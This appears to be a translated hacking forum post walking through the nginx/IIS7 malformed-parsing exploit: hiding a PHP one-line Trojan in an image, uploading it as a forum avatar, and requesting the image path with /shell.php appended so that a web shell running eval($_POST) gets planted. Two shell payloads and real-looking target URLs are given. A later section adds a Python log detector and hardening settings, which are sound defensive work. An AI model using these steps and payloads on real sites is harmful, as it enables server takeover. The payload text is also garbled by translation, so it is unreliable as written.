The penetration method is actually no different from that on the Internet.
You can check it online
Kill IIS7.0 malformed parsing 0-Day Vulnerability
First, merge a PHP one-sentence Trojan into an image. The merge methods are as follows:
① DOS merge: copy 1.gif /b + 1.txt /a asp.gif
② Use edjpgcom to merge an image with the one-sentence Trojan.
Find any image.
[How to use edjpgcom: open the folder where edjpgcom.exe is located and drag the image you want to modify
onto edjpgcom.exe; edjpgcom.exe then opens automatically and you write the desired code into it.]
The one-sentence Trojan:
<? PHP fputs (fopen ('Shell. php', 'w'), '<? Php eval ($ _ POST [cmd])?> ');?>
Find an nginx site, register a user, and then upload the merged image in the forum.
Find the image address, append shell.php to the address, and open it in the browser.
Assume that the image address is http://www.bkjia.com/fuck/1.jpg
The execution address is then http://www.bkjia.com/fuck/1.jpg/shell.php
shell.php is then generated in that directory.
For example, www.2cto.com/tupian/shell.php
shell.php is the address of our one-sentence Trojan. Connect the one-sentence client to this address.
The above is the whole process of taking a site through Nginx; IIS7.0's malformed parsing is similar.
Upload to get the image address.
After the image extension add xx.php, where xx is arbitrary; only the .php suffix matters.
<? Fputs (fopen ("fuck. php", "w"), "<? Eval (\$ _ POST [fuck]) ;?> ")?>
Upload an image containing the one-sentence Trojan as the avatar, access the avatar address, and append /xx.php, where xx can be anything.
The rest of you know!
The above is also very detailed!
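For defenders, the request shape described above (an image address with an extra /xx.php segment appended) is easy to find in access logs. The following is an added example, not part of the original post: it assumes combined-format nginx/IIS-style log lines, and the sample lines, paths and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# A static-file extension followed by one extra path segment ending in .php,
# e.g. /uploads/1.jpg/shell.php (the malformed-parsing request shape).
STATIC_THEN_PHP = re.compile(
    r"\.(?:jpe?g|gif|png|bmp|ico|txt|css|js)/[^/]*\.php$", re.IGNORECASE)

# Request and status fields of a combined-format access log line.
REQUEST = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def is_malformed_parse_request(target: str) -> bool:
    """True if the request path looks like <static file>/<name>.php."""
    path = urlsplit(target).path          # drop query string and fragment
    for _ in range(2):                    # undo single and double percent-encoding
        path = unquote(path)
    return bool(STATIC_THEN_PHP.search(path))

def find_suspicious(lines):
    """Return (method, target, status) for every matching log line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and is_malformed_parse_request(m["target"]):
            hits.append((m["method"], m["target"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /forum/avatar/1.jpg HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /forum/avatar/1.jpg/shell.php HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "POST /forum/avatar/7.gif%2Fxx.PHP?a=1 HTTP/1.1" 404 162 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for method, target, status in find_suspicious(SAMPLE_LOG):
        # A 200 means the server answered a path *below* an image file:
        # triage those first; a 404 is what a hardened server returns.
        flag = "INVESTIGATE" if status == 200 else "blocked"
        print(f"{flag:11} {status} {method} {target}")
```

On nginx with PHP-FPM the usual hardening is `cgi.fix_pathinfo=0` in php.ini or `try_files $uri =404;` in the PHP location block, after which these requests return 404 instead of executing the image.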
Author: Noseay